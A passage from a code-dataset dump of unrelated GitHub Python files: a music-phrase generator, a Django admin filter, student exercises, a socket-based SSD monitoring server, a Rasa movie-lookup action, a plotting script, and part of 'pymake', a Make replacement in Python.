pitch_sequence=(0,2)\n # transpose=7\n\nclass PhraseC(PhraseA):\n pitch_sequence=(3,0)\n pitch_directions=(1,-1) \n rhythm_sequence=(2,1) \n rhythm_multiplies=(1,2)\n\nclass GenerationTestMusic(Bubble):\n line1 = GenLine(pitches=(0,1), rhythms=(0,1))\n\nclass GenerationLine(Line):\n phrase1 = PhraseA()\n phrase2 = PhraseB()\n phrase3 = PhraseC()\n phrase4 = phrase1\n sequence=(\"phrase1\",\"phrase2\",\"phrase3\",\"phrase4\",)\n\nclass GenerationLineMixup(GenerationLine):\n phrase1 = PhraseC()\n phrase2 = PhraseA()\n phrase3 = phrase2\n phrase4 = PhraseB()\n\nclass SpacePhrases(object):\n pickup = Line(\"r4 r\")\n tail = Line(\"r4\")\n sequence = (\"pickup\",\"phrase1\",\"tail\",\"pickup\",\"phrase2\",\"tail\",\"pickup\",\"phrase3\",\"tail\",\"pickup\",\"phrase4\",\"tail\",)\n\nclass SpaceGenerationLine(SpacePhrases, GenerationLine):\n pass\nclass SpaceGenerationLineMixup(SpacePhrases, GenerationLineMixup):\n pass\n\n# class UpHarmony1(object):\n# def music(self):\n# my_music = super().music()\n# return my_music\n\n# class GenerationLineFifth(UpHarmony1, GenerationLine):\n# pass\n\nclass TestMusic(Bubble):\n line1 = In3Time() + SpaceGenerationLine()\n line2 = In3Time() + Tr(line1, 7)\n line3 = In3Time() + SpaceGenerationLineMixup()\n line4 = In3Time() + Tr(line3, 7)\n sequence=(\"line2\",\"line1\", \"line4\", \"line3\")\n\n# m = TestMusic()\n# m.show()\n\n# m = TestMusic()\n# m.show()\n\n# 3 pitch rows\n# 1st row is initial line\n# 2nd row is always a 5th apart\n# create a routine to get the 3rd note\n# create a routine to arrange pitches\n\n# row = [9, 7, 6, 2, -1, 1, 2]\n\n# notes = [Note(p, (1,8)) for p in row]\n# notes2 = [Note(p-7, (1,8)) for p in row]\n# row3 = [row[(i+3) % len(row) ]+7 for i in range(len(row)) ]\n# notes3 = [Note(p, (1,8)) for p in row3]\n\n# st1 = Staff()\n# st1.extend(notes)\n\n# st2 = Staff()\n# st2.extend(notes2)\n\n# st3 = Staff()\n# st3.extend( parse(\"{ R1 }\") )\n\n# sc = Score()\n# sc.append(st3)\n# sc.append(st1)\n# sc.append(st2)\n\n\n# show(sc)\n","repo_name":"mirrorecho/rwestmusic-copper","sub_path":"copper/_bak/bak_generations.py","file_name":"bak_generations.py","file_ext":"py","file_size_in_byte":5502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36260641755","text":"from django.contrib.admin import RelatedFieldListFilter\nfrom django.contrib.admin.utils import get_model_from_relation\nfrom django.core.urlresolvers import reverse\nfrom django.forms.utils import flatatt\nfrom django.utils.encoding import smart_text\nfrom django.utils.html import format_html\n\n\nclass RelatedFieldAjaxListFilter(RelatedFieldListFilter):\n ajax_attrs = None\n\n def has_output(self):\n return True\n\n def field_choices(self, field, request, model_admin):\n app_label = field.related_model._meta.app_label\n model_name = field.related_model._meta.object_name\n\n self.ajax_attrs = format_html('{}', flatatt({\n 'data-app-label': app_label,\n 'data-model': model_name,\n 'data-ajax--url': reverse('jet:model_lookup'),\n 'data-queryset--lookup': self.lookup_kwarg\n }))\n\n if self.lookup_val is None:\n return []\n\n other_model = get_model_from_relation(field)\n if hasattr(field, 'rel'):\n rel_name = field.rel.get_related_field().name\n else:\n rel_name = other_model._meta.pk.name\n\n queryset = field.related_model._default_manager.filter(**{rel_name: self.lookup_val}).all()\n return [(x._get_pk_val(), smart_text(x)) for x in queryset]\n","repo_name":"kelwys/Siscon","sub_path":"jet/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31133773448","text":"def dist_calc(idx, pos):\n if idx ==1:\n return pos\n elif idx==2:\n return C + R + C - pos\n elif idx==3:\n return C + R + C + R -pos\n else:\n return C+pos\n\nC,R =map(int,input().split())\ncircumference=(C+R)*2\n\nN=int(input())\ndist=[]\nfor i in range(N+1):\n idx,pos=map(int,input().split())\n dist.append(dist_calc(idx,pos))\n\nmy_dist=dist[-1]\n\nanwwer=0\n\nfor i in range(N):\n clockwise=abs(my_dist-dist[i])\n anwwer+=min(clockwise,circumference-clockwise)\n\nprint(anwwer)\n","repo_name":"SangRakee/AlgoriGym","sub_path":"BOJ/경비원_2564.py","file_name":"경비원_2564.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5150727239","text":"#!/usr/bin/python4\ndef safe_print_list(my_list=[], x=1):\n count = 0\n try:\n for idx, el in enumerate(my_list):\n if idx == x:\n break\n print(\"{}\".format(el), end=\"\")\n count += 1\n except IndexError:\n count = 5\n print()\n return count\n","repo_name":"lijsamuael/alx-higher_level_programming","sub_path":"0x05-python-exceptions/0-safe_print_list.py","file_name":"0-safe_print_list.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38434780498","text":"import socket\nimport struct\nimport threading\nimport time\nimport json\nimport os\n\n\nclass Log():\n '''log类'''\n def __init__(self, log_name):\n if type(log_name) != str:\n raise TypeError('Wrong log_name type, it should be str.')\n self.log_name = log_name + '.log'\n\n def write(self, strings):\n if type(strings) != str:\n raise TypeError('Wrong log string type, it should be str.')\n with open(self.log_name, 'a') as file:\n c_readable_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n file.write(c_readable_time + ' ' + strings)\n\n def trash(self):\n with open(self.log_name, 'w') as file:\n trash_warning = 'log deleted by host.'\n file.write(trash_warning)\n\nclass Inbox():\n '''模拟一个支持多线程的socket服务端'''\n\n def __init__(self, port_number):\n '''设置socket基础信息'''\n self.__record = []\n self.__led = False\n self.__s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.__s.bind(('', port_number))\n self.__s.listen(5)\n self.__s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n def on(self):\n '''将serverDameon函数设置为守护线程,放置在后台运行'''\n def serverDaemon(self):\n '''无限循环接受远程联入信息,转交dataRecv函数处理,并为每一次联入单开一个线程,支持多线程'''\n def dataRecv(self, sock, addr, lock):\n '''获取锁以后,每1024个字节收一次数据包,解析并添加到类属性列表中,同时设置led状态为True,通讯完毕后端口关闭,释放锁'''\n lock.acquire() # 获取进程锁\n dataBuffer = bytes() # 初始化网络数据缓存区\n headerSize = 4 # 规定头信息所占用的字节数\n while True: \n data = sock.recv(1024)\n if data:\n dataBuffer += data\n if len(dataBuffer) < headerSize: # 模拟header信息接收不全的状态,\n continue\n headpack = struct.unpack('!I',dataBuffer[:headerSize]) # header仅包含数据包大小的描述信息\n bodySize = headpack[0]\n if len(dataBuffer) < headerSize + bodySize: # 模拟单次发送信息不全的情况\n continue\n body = dataBuffer[headerSize:headerSize+bodySize]\n decode_data = json.loads(body.decode('utf-8'))\n self.__record.append(decode_data)\n self.__led = True\n dataBuffer = bytes() # 考虑到客户端脚本规定,发送完全部信息后关闭端口,dataBuffer无需处理粘包的情况\n break\n else:\n break\n lock.release()\n sock.close()\n return\n lock = threading.Lock()\n while True:\n sock, addr = self.__s.accept()\n t1 = threading.Thread(target=dataRecv, args=(self, sock, addr, lock))\n t1.start()\n return\n t1 = threading.Thread(target=serverDaemon, args=(self,), daemon=True)\n t1.start() \n\n def led(self):\n '''判断led灯当前状态'''\n return self.__led\n\n def vomit(self):\n '''返回属性类堆栈中的第一条信息'''\n if not self.__record:\n return None\n else:\n if len(self.__record) is 1:\n self.__led = False\n return self.__record.pop(0)\n\nclass DictCompare():\n '''模拟一个比较器,用来比较字典的内容'''\n def __init__(self):\n\n self.increase = []\n self.decrease = []\n self.diff = []\n \n def compare(self, new_item, old_item):\n self.increase = [] # bug fix: log打印重复信息\n self.decrease = [] # bug fix: log打印重复信息\n self.diff = [] # bug fix: log打印重复信息\n\n if not type(old_item) == type(new_item):\n raise ValueError('type error. different type cannot be compared.')\n if new_item and old_item:\n for key in new_item:\n if key not in old_item:\n self.increase.append(key)\n else:\n if new_item[key] == old_item[key]:\n continue\n else:\n self.diff.append(key)\n for key in old_item:\n if key not in new_item:\n self.decrease.append(key)\n elif new_item:\n self.increase = list(old_item.keys())\n elif old_item:\n self.decrease = list(new_item.keys())\n\n return self.increase, self.decrease, self.diff \n\n\ndef load_main_dict(main_dict_file):\n '''尝试从本地json文件恢复main_dict,以防止主控以外关闭导致的数据丢失'''\n\n if os.path.exists(main_dict_file):\n with open(main_dict_file, 'r') as main_dict_obj:\n main_dict = json.load(main_dict_obj)\n else:\n main_dict = dict()\n return main_dict\n\ndef process(message):\n if isinstance(message, dict) and \"type\" in message:\n message_type = message.pop(\"type\")\n else:\n raise ValueError(\"message type error, it should be dict and contain 'type' key\")\n \n if message_type == \"monitor\":\n monitor_processor(message)\n elif message_type == \"powercycle\":\n powercycle_processor(message)\n \ndef powercycle_processor(message):\n print('under construction.')\n pass\n\ndef monitor_processor(message):\n '''主字典刷新及log记录操作'''\n identifier = message.pop(\"id\") # id should be timestamp + ip string,\n info_level = message.pop(\"level\") # 0 init 1 update 2 heart_beat\n if info_level is 0:\n sub_init_process(identifier, message)\n elif info_level is 1:\n server_info = message.get(\"server_info\")\n script_info = message.get(\"script_info\")\n ssd_info = message.get(\"ssd_info\")\n if server_info:\n sub_single_dict_process(\"server_info\",server_info,identifier)\n if script_info:\n sub_single_dict_process(\"script_info\",script_info,identifier)\n if ssd_info:\n sub_ssd_process(ssd_info, identifier)\n elif info_level is 2:\n info = '[{0}] ^^^ Alive Detected ^^^'.format(identifier)\n main_log.write(info)\n main_dict.update({identifier : message})\n return\n\ndef sub_init_process(identifier, message):\n # server_info = message.get(\"server_info\")\n ssd_info = message.get(\"ssd_info\")\n info = '====== New Clietn Join ======\\n'\n\n\n for key, value in ssd_info.items():\n info = info + '{0} : {1}\\n'.format(key, value)\n main_log.write(info)\n warning_log.write(info)\n\ndef sub_single_dict_process(single_dict_name, single_dict_info, identifier):\n old_record = main_dict.get(identifier)\n if old_record:\n old_dict_info = old_record.get(single_dict_name)\n increase_key, decrease_key, diff_key = dict_comp.compare(single_dict_info, old_dict_info)\n if increase_key:\n for key in increase_key:\n info = '[{0}] +++ Add Detected +++ [add {1} : {2}]\\n'.format(identifier, key, single_dict_info[key])\n main_log.write(info)\n warning_log.write(info)\n if decrease_key:\n for key in decrease_key:\n info = '[{0}] xxx Remove Detected xxx [remove {1} : {2}]\\n'.format(identifier, key, single_dict_info[key])\n main_log.write(info)\n warning_log.write(info)\n error_log.write(info)\n if diff_key:\n for key in diff_key:\n info = '[{0}] ??? Change Detected ??? [change {1} : {2} ===> {3}\\n]'.format(identifier,key,old_dict_info[key],single_dict_info[key])\n else:\n print('{0} info not found, init client to resend the message.'.format(identifier))\n\n return\n\ndef sub_ssd_process(new_ssd_sum, identifier):\n old_ssd_sum = main_dict[identifier][\"ssd_info\"]\n insert_ssd, eject_ssd, diff_ssd = dict_comp.compare(new_ssd_sum, old_ssd_sum)\n if insert_ssd:\n for bus_num in insert_ssd:\n info = '{0} +++ SSD Insert Detected +++\\n'.format(identifier)\n ssd_detail = new_ssd_sum[bus_num]\n for key, value in ssd_detail.items():\n info += '[{0} : {1}]\\n'.format(key, value)\n print(info)\n main_log.write(info)\n if eject_ssd:\n for bus_num in eject_ssd:\n info = '{0} xxx SSD Eject Detected xxx\\n'.format(identifier)\n ssd_detail = old_ssd_sum[bus_num]\n for key, value in ssd_detail.items():\n info += '[{0} : {1}]\\n'.format(key, value)\n print(info)\n main_log.write(info)\n if diff_ssd:\n head = '{0} --- SSD Info Change Notice ---\\n'.format(identifier)\n bodybox = []\n for bus_num in diff_ssd:\n new_ssd_detail = new_ssd_sum[bus_num]\n old_ssd_detail = old_ssd_sum[bus_num]\n disk_num = new_ssd_detail['disk_num']\n boot = new_ssd_detail['boot']\n pci_num = new_ssd_detail['pci_num']\n sn_num = new_ssd_detail['sn']\n body = '[{0}][{1}][{2}]-{3}-'.format(pci_num,sn_num,disk_num,boot)\n for item in new_ssd_detail:\n if new_ssd_detail[item] != old_ssd_detail[item]:\n if item == 'temperature':\n if int(new_ssd_detail[item][:-1]) < 60: \n continue\n info = ' [{0} : {1} ===> {2}]\\n'.format(item, old_ssd_detail[item], new_ssd_detail[item])\n notice = body + info\n bodybox.append(notice)\n if bodybox:\n print(head)\n main_log.write(head)\n for notice in bodybox:\n print(notice)\n main_log.write(notice)\n else:\n info = '[{0}] ^^^ Alive Detected ^^^\\n'.format(identifier)\n print(info)\n main_log.write(info)\n\n\n# ------ Danger Zone ------ #\nmain_dict_file = 'main_dict.json'\nmonitor_inbox = Inbox(1025) # 建立监控服务器\ndict_comp = DictCompare()\nmain_log = Log('main') # 定义主log\nwarning_log = Log('warning') # 定义警告log\nerror_log = Log('error') # 定义错误log\n\nmonitor_inbox.on() # 开启监控进程\nmain_dict = load_main_dict(main_dict_file) # 读取主数据库\n\nwhile True:\n if monitor_inbox.led():\n message = monitor_inbox.vomit()\n process(message)\n else:\n with open(main_dict_file, 'w') as db:\n json.dump(main_dict, db)\n time.sleep(2)\n","repo_name":"kouyu66/work_shop","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":10900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22643062827","text":"import requests\r\nfrom credentials import *\r\nclass Send_SMS:\r\n def send_text_message(number, message):\r\n url =\"https://api.jive.com/messaging/v1/messages\"\r\n headers={'Content-Type':'application/json', 'Authorization': Authrization.BEARER_TOKEN }\r\n r = requests.post(url,headers=headers ,json = {\"ownerPhoneNumber\": \"+17734823900\", \"contactPhoneNumbers\": [ number ], \"body\": message})\r\n print(r)\r\n\r\n\r\n","repo_name":"zawahirkashif/Handle-Abandon-With-Goto-Connect-API","sub_path":"send_sms.py","file_name":"send_sms.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15172908728","text":"# This files contains your custom actions which can be used to run\n# custom Python code.\n#\n# See this guide on how to implement these action:\n# https://rasa.com/docs/rasa/custom-actions\n\n\n# This is a simple example for a custom action which utters \"Hello World!\"\nimport csv\nfrom pathlib import Path\nfrom typing import Any, Counter, Text, Dict, List\nfrom rasa_sdk import Action, Tracker\nfrom rasa_sdk.executor import CollectingDispatcher\nimport pandas as pd\n\n\n\n\nclass ActionGetMovieOnGenre(Action):\n\n def name(self) -> Text:\n return \"action_get_movie_on_genre\"\n\n def run(self, dispatcher: CollectingDispatcher,\n tracker: Tracker,\n domain: Dict[Text, Any]) -> List[Dict[Text, Any]]:\n\n #getting the slot value and storing into the genres slot value\n genres_slot = tracker.get_slot('genres')\n #reading the csv file\n with open('C:/Users/titio/fyp/prototype/data/imdb_top_1000.csv', 'r', encoding=\"utf-8\") as file:\n reader = csv.DictReader(file)\n #getting a list of movies matching the criteria\n output = [row for row in reader if row['Genre'][0].lower() == genres_slot]\n if output:\n #if the list is not null, return movie title\n reply = f\"Here are some {genres_slot} Movies:\"\n reply += \"\\n-\" + \"\\n-\".join([item['Series_Title'] for item in output])\n dispatcher.utter_message(reply)\n else:\n #if the list is empty, tell user that no matches were found\n dispatcher.utter_message(f\"I couldn't find any {genres_slot} movies\")\n\n\n \n \n\n\n\n\n","repo_name":"TTOlurin/FYP-prototype","sub_path":"actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40802897751","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport csv\nfrom numpy import *\n\nx1 = []\ny1 = []\n\nx2 = []\ny2 = []\n\nx3 = []\ny3 = []\n\nx4 = []\ny4 = []\n\nwith open('mr.out', 'r') as csvfile:\n plots = csv.reader(csvfile, delimiter=',')\n for row in plots:\n x1.append(float(row[0]))\n y1.append(float(row[1]))\n\nplt.plot(x1, y1, label='Euler')\n\nwith open('rec_stefan.out', 'r') as csvfile:\n plots = csv.reader(csvfile, delimiter=',')\n for row in plots:\n x2.append(float(row[0]))\n y2.append(float(row[1]))\n\n#plt.plot(x2, y2, 'ro', label='Rec_Stefan')\n\nwith open('log_new', 'r') as csvfile:\n plots = csv.reader(csvfile, delimiter=',')\n for row in plots:\n x3.append(float(row[0]))\n y3.append(float(row[1]))\n\nplt.plot(x3, y3, 'go', label='Rec_Stefan')\n\nwith open('rec_stefan_rk4.out', 'r') as csvfile:\n plots = csv.reader(csvfile, delimiter=',')\n for row in plots:\n x4.append(float(row[0]))\n y4.append(float(row[1]))\n\n#plt.plot(x4, y4, 'co', label='Rec_Stefan_RK4')\n\n\n#plt.subplot(2,1,1)\n#plt.plot(x1, y1, label='Euler')\n#plt.plot(x2, y2, 'ro', label='Rec_Stefan')\n#plt.plot(x3, y3, 'go', label='Rec_Jan')\n#plt.ylabel('M')\n#plt.legend()\n\n#plt.subplot(2,1,2)\n#plt.plot(x1, y1, label='Euler')\n#plt.plot(x4, y4, 'ro', label='Rec_Stefan_RK4')\n#plt.plot(x3, y3, 'go', label='Rec_Jan')\n#plt.ylabel('M')\n#plt.legend()\n\n\nplt.title('Mass-Radius-Relation\\nReconstruction Algorithms')\nplt.ylabel('M(R)')\nplt.xlabel('R')\nplt.legend()\nplt.show()\n","repo_name":"jroeder-astro/thesis","sub_path":"new/meh.py","file_name":"meh.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74189115368","text":"#! /usr/bin/env python\n\"\"\"A GNU Make replacement in python.\n\nA python scripe which import pymake, defines a list of rules and\ncalls \"maker(rules, trgt)\" is now a standalone makefile.\n\nInternally, rules are parsed into a dependency tree of \"requirements\",\nthis is compressed into a hierarchical list of orders, and then the\norders are executed.\n\n\"\"\"\n\n\nimport subprocess\nimport re\nimport os\nimport sys\nimport itertools\nimport optparse\nimport logging\nfrom contextlib import contextmanager\nfrom threading import Thread, Event\nfrom math import isnan\n\n\nLOG = logging.getLogger(__name__)\n\n@contextmanager\ndef backup_existing_while(path, extension=\"~\", prepend=\"\", else_on_fail=None):\n \"\"\"A context manager to backup a file during an action, then remove it.\n\n File at *path*, if it exists, is moved to the backup location\n defined by *prepend* + path + *extension*. When the context manager\n is closed without error, the backup is removed.\n\n If an error occurs while the file is backed up, whatever now exists at\n *path* is replaced by the backup.\n\n If *path* did not exist, whatever now exists at *path* is served as an\n argument to *else_on_fail*.\n\n Takes one position argument:\n *path*\n Takes three keyword arguments:\n *extension* (default: '~')\n *prepend* (default: ''),\n *else_on_fail* (default: None)\n\n \"\"\"\n backup_path = os.path.join(os.path.dirname(path),\n prepend + os.path.basename(path) + extension)\n original_exists = os.path.exists(path)\n if original_exists:\n LOG.debug(\"backing up the extant {path}\".format(path=path))\n os.rename(path, backup_path)\n try:\n yield\n except Exception as err:\n LOG.debug(\"an error occured while {path} was backed up\".\\\n format(path=path))\n new_exists = os.path.exists(path)\n if original_exists:\n LOG.debug((\"since {backup_path} exists, \"\n \"it will replace any new {path}\").\\\n format(path=path, backup_path=backup_path))\n os.rename(backup_path, path)\n elif new_exists and else_on_fail:\n LOG.debug((\"since {backup_path} does not exist, \"\n \"{else_on_fail} will be called on {path}\").\\\n format(backup_path=backup_path,\n else_on_fail=else_on_fail, path=path))\n else_on_fail(path)\n raise err\n else:\n if original_exists:\n LOG.debug((\"no error occurred while {path} was backed up. \"\n \"{backup_path} will be removed.\").\\\n format(path=path, backup_path=backup_path))\n os.remove(backup_path)\n\n\nclass Rule():\n \"\"\"A task construction and dependency rule.\n\n A rule is a template for a task, defining:\n\n *trgt* - a target pattern; a regular expression matching targets\n of the rule\n *preqs* - a list of prerequisite templates\n *recipe* - a recipe template\n\n Rules construct Tasks.\n\n \"\"\"\n\n def __init__(self, trgt, preqs=[], recipe=None,\n order_only=False, **env):\n self.env = env\n self.target_template = trgt\n self.prerequisite_templates = [template.strip() for template in preqs]\n self.recipe_template = recipe\n if self.recipe_template == '':\n self.recipe_template = None\n self.order_only = order_only\n\n def __repr__(self):\n return (\"Rule(trgt={self.target_template!r}, \"\n \"preqs={self.prerequisite_templates!r}, \"\n \"recipe={self.recipe_template!r}, \"\n \"**{self.env!r})\").format(self=self)\n\n def __str__(self):\n return self.target_template\n# return (\"{self.target_template} : {self.prerequisite_templates}\\n\"\n# \"{self.recipe_template}\").format(self=self)\n\n def set_env(self, env):\n self.env = env\n\n def update_env(self, env_update):\n self.set_env(dict(list(self.env.items()) + list(env_update.items())))\n\n def get_target(self):\n return self.target_template\n\n def _get_target_pattern(self):\n \"\"\"Return the target pattern.\n\n The target pattern is returned as an exact regex.\n (i.e. with ^ and $ around it.)\n\n \"\"\"\n return \"^\" + self.target_template.format(**self.env) + \"$\"\n\n def _make_target_groups(self, trgt):\n \"\"\"Return regex groups for a target.\n\n \"\"\"\n target_pattern = self._get_target_pattern()\n match = re.match(target_pattern, trgt)\n if match is not None:\n return match.groups()\n else:\n raise ValueError(\"{trgt} does not match {ptrn}\".\n format(trgt=trgt, ptrn=target_pattern))\n\n def applies(self, trgt):\n \"\"\"Return if the query target matches the rule's pattern.\"\"\"\n try:\n self._make_target_groups(trgt)\n except ValueError:\n return False\n else:\n return True\n\n def _make_preqs(self, trgt):\n \"\"\"Return a list of prerequistites for the target.\n\n Construct pre-requisites by matching the rule's target\n pattern to the *trgt* string.\n\n \"\"\"\n groups = self._make_target_groups(trgt)\n prerequisites = [template.format(*groups, trgt=trgt, **self.env)\n for template in self.prerequisite_templates]\n return prerequisites\n\n def _make_recipe(self, trgt):\n \"\"\"Return the recipe for the target.\n\n Construct the recipe by matching the rule's target\n pattern to the *trgt* string.\n\n \"\"\"\n assert self.recipe_template is not None\n groups = self._make_target_groups(trgt)\n preqs = self._make_preqs(trgt)\n all_preqs = \" \".join(preqs)\n return self.recipe_template.format(*groups, trgt=trgt,\n preqs=preqs, all_preqs=all_preqs,\n **self.env)\n\n def make_task(self, trgt):\n \"\"\"Return a task reprisentation of rule applied to *trgt*.\"\"\"\n # The trgt should always match the pattern.\n assert self.applies(trgt)\n if self.recipe_template is None:\n return DummyReq(trgt, self._make_preqs(trgt))\n else:\n return TaskReq(trgt, self._make_preqs(trgt),\n self._make_recipe(trgt), self.order_only)\n\n def make_req(self, trgt):\n self.make_task(self, trgt)\n\n\nclass Requirement():\n \"\"\"Base class for all requirements.\n\n Requirements are items which must be verified or carried out in a\n particular order. All requirements have a \"target\" which should be\n a unique identifier for the requirement, usually a file path.\n\n A Rule produces a particular type of requirement called a Task\n which consists of the filled in recipe template.\n\n \"\"\"\n\n def __init__(self, trgt):\n self.target = trgt\n\n def __repr__(self):\n return (\"{self.__class__.__name__}\"\n \"(trgt={self.target!r})\").format(self=self)\n\n def __str__(self):\n return self.target\n\n def __hash__(self):\n return hash(self.target)\n\n def __eq__(self, other):\n return self.target == other.target\n\n def last_update(self):\n \"\"\"Return the time that the target was last updated.\n\n The time returned determines the whether or not other tasks are\n considered up to date, so if you want all tasks which depend on\n the given task to run, this function should return a larger value.\n\n float('nan') should be returned when the time of last update cannot\n be determined.\n\n \"\"\"\n raise NotImplementedError(\"The base Requirement class has not \"\n \"implemented last_update, but it *should* \"\n \"be implemented in all functioning \"\n \"sub-classes\")\n\n\nclass FileReq(Requirement):\n \"\"\"A Requirement with a target that is a file.\"\"\"\n\n def __init__(self, trgt):\n super(FileReq, self).__init__(trgt=trgt)\n\n def last_update(self):\n if os.path.exists(self.target):\n return os.path.getmtime(self.target)\n else:\n return float('nan')\n\n\nclass TaskReq(FileReq):\n \"\"\"A requirement which defines how to make the target file.\"\"\"\n\n def __init__(self, trgt, preqs, recipe, order_only=False):\n super(TaskReq, self).__init__(trgt=trgt)\n self.prerequisites = preqs\n self.recipe = recipe\n self.order_only = order_only\n\n def __repr__(self):\n return (\"{self.__class__.__name__}(trgt={self.target!r}, \"\n \"preqs={self.prerequisites!r}, \"\n \"recipe={self.recipe!r})\").format(self=self)\n\n def __str__(self):\n return self.target\n\n def __hash__(self):\n return hash(self.recipe)\n\n def __eq__(self, other):\n # But for TaskReq objects, the recipe itself determines identity.\n return self.recipe == other.recipe\n\n def last_update(self):\n if self.order_only and os.path.exists(self.target):\n # If it exists, those for which it is a pre-requisite\n # (either directly or indirectly) should not be considered\n # out of date, regardless of updates to this file.\n return 0.0\n else:\n return super(TaskReq, self).last_update()\n\n def run(self, verbose=1, execute=True, exc_event=None, **kwargs):\n \"\"\"Run the task to create the target.\"\"\"\n LOG.debug(\"running task for '{self.target}'\".format(self=self))\n msg = \"{self.recipe}\".format(self=self).rstrip('\\n')\n for line in msg.split('\\n'):\n LOG.info(\"| in| \" + line)\n if execute:\n with backup_existing_while(self.target, prepend='.',\n extension='~pymake_backup',\n else_on_fail=os.remove):\n logging.debug(\"executing recipe for '{self.target}'\".\\\n format(self=self))\n proc = subprocess.Popen(self.recipe, shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n bufsize=4096)\n for line in proc.stdout:\n line = line.decode()\n LOG.info(\"|out| \" + line.rstrip('\\n'))\n if proc.wait() != 0:\n raise subprocess.CalledProcessError(proc.returncode,\n self.recipe)\n\n\nclass DummyReq(Requirement):\n \"\"\"A requirement which only points to other requirements.\"\"\"\n\n def __init__(self, trgt, preqs):\n super(DummyReq, self).__init__(trgt=trgt)\n self.prerequisites = preqs\n\n def last_update(self):\n return float('nan')\n\n def run(self, verbose=1, **kwargs):\n msg = (\"DummyReq '{self.target}' running, which usually \"\n \"indicates that all sub-tasks are completed.\").\\\n format(self=self)\n LOG.info(msg)\n\n\ndef build_dep_graph(trgt, rules):\n \"\"\"Return the root and a dependency graph.\n\n A dependency graph is a direction network linking tasks to their\n pre-requisites.\n\n This function encodes the graph as a recursive dictionary of Requirement\n objects. Each requirement points to it's pre-requisites, which\n themselves point to their own pre-requisites, etc.\n\n The returned graph is guarenteed to be acyclic.\n\n Operates recursively.\n\n \"\"\"\n LOG.debug(\"entered build_dep_graph for '{trgt}'\".format(trgt=trgt))\n rules = list(rules)\n trgt_rule = None\n for i, rule in enumerate(rules):\n if rule.applies(trgt):\n trgt_rule = rules.pop(i)\n LOG.debug(\"'{trgt_rule!s}' applies to '{trgt}'\".\\\n format(trgt_rule=trgt_rule, trgt=trgt))\n break\n if trgt_rule is None:\n LOG.debug(\"no rule found which applies to '{trgt}'\".format(trgt=trgt))\n if os.path.exists(trgt):\n LOG.debug(\"'{trgt}' exists\".format(trgt=trgt))\n requirement = FileReq(trgt)\n return requirement, {requirement: set()}\n else:\n raise ValueError((\"No rule defined for {trgt!r}, the required \"\n \"file doesn't exist, or there is a \"\n \"cycle in the dependency graph.\")\n .format(trgt=trgt))\n trgt_task = trgt_rule.make_task(trgt)\n preq_trgts = trgt_task.prerequisites\n preq_tasks = set()\n trgt_graph = {}\n for preq_trgt in preq_trgts:\n preq_task, preq_graph = build_dep_graph(preq_trgt, rules)\n preq_tasks.add(preq_task)\n trgt_graph = dict(list(trgt_graph.items()) + list(preq_graph.items()))\n trgt_graph[trgt_task] = preq_tasks\n return trgt_task, trgt_graph\n\n\ndef merge_orders(*iters):\n \"\"\"Yield merged sets from *iters*.\n\n Takes any number of iterators of sets and merges sets from the front.\n Where any given entry in a set only occurs once.\n\n This function is meant to deal with the semi-ordered (i.e. priority\n ordered, but with ties) lists of requirements which must be merged\n together.\n\n \"\"\"\n returned_set = set()\n for priority_orders in itertools.zip_longest(*iters, fillvalue=set()):\n priority_set = set.union(*priority_orders)\n priority_set -= returned_set\n returned_set |= priority_set\n if priority_set != set():\n yield priority_set\n\n\ndef build_orders(req, graph):\n \"\"\"Return a list of requirements in priority order.\n\n Given a dependency graph and a root requirement, returns a list\n of sets. The requirements in every set only depend on requirements\n further down the orders list.\n\n Operates recursively.\n\n \"\"\"\n last_req_update = req.last_update()\n if (req not in graph) or (len(graph[req]) == 0):\n LOG.debug(\"'{req!s}' is a leaf requirement\".format(req=req))\n if not hasattr(req, 'run'):\n LOG.debug(\"'{req!s}' is not runnable\".format(req=req))\n return [set()], last_req_update\n elif not isnan(last_req_update): # The target already exists:\n LOG.debug(\"'{req!s}' last updated at {last_update}\".\\\n format(req=req, last_update=last_req_update))\n return [set()], last_req_update\n else: # The target does not exist and the task is runnable:\n LOG.debug((\"'{req!s}' does not exist; the task to create \"\n \"it has been added to the build orders\").\\\n format(req=req))\n return [{req}], last_req_update\n preq_update_times = []\n preq_orders_lists = []\n for preq in graph[req]:\n orders_list, update_time = build_orders(preq, graph)\n preq_orders_lists.append(orders_list)\n preq_update_times.append(update_time)\n last_graph_update = max(preq_update_times)\n LOG.debug((\"the most recent update of a pre-requisite for \"\n \"'{req!s}' was at {last_update}\").\\\n format(req=req, last_update=last_graph_update))\n preq_orders_list = list(merge_orders(*preq_orders_lists))\n # Remember that last_graph_update is *nan* if _any_ prereq is nan.\n # last_req_update is nan if the target file does not currently exist.\n # Therefore, a set of orders will be returned when either of these\n # possibilities occurs (plus the canonical case, when any precursor\n # was updated more recently than the focal requirement.)\n if last_graph_update < last_req_update:\n LOG.debug(\"'{req!s}' is up-to-date\".format(req=req))\n return [set()], last_req_update\n else:\n LOG.debug(\"'{req!s}' is not up-to-date and will be updated.\".\\\n format(req=req))\n return [{req}] + preq_orders_list, last_graph_update\n\n\ndef run_orders(orders, parallel=False, **kwargs):\n \"\"\"Execute each requirement in a dependency list in order.\n\n If 